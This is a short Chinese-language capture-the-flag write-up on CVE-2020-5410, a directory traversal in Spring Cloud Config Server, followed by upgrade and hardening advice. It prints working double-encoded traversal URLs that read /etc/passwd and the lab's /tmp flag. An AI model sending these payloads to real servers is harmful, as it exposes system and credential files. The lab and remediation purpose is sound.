漏洞介绍
名称: Spring 目录遍历 (CVE-2020-5410 )
描述: Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。
解题过程
1.打开靶场环境
2.访问指定路径并抓包,看到etc/passwd下的文件都被遍历出来了(抓不抓包都行,抓包看着更方便)
/…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252Fetc%252Fpasswd%23foo/development
3.换成查看tmp下的文件命令,读取到flag
http://118.193.36.37:36498/…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252Ftmp%23foo/development
修复建议:
升级到 Spring Cloud Config 至2.2.3版本或2.1.9版本,并且将Spring-Cloud-Config-Server服务放置在内网中,同时使用Spring Security进行身份验证。最新版本下载地址为:https://github.com/spring-cloud/spring-cloud-config/releases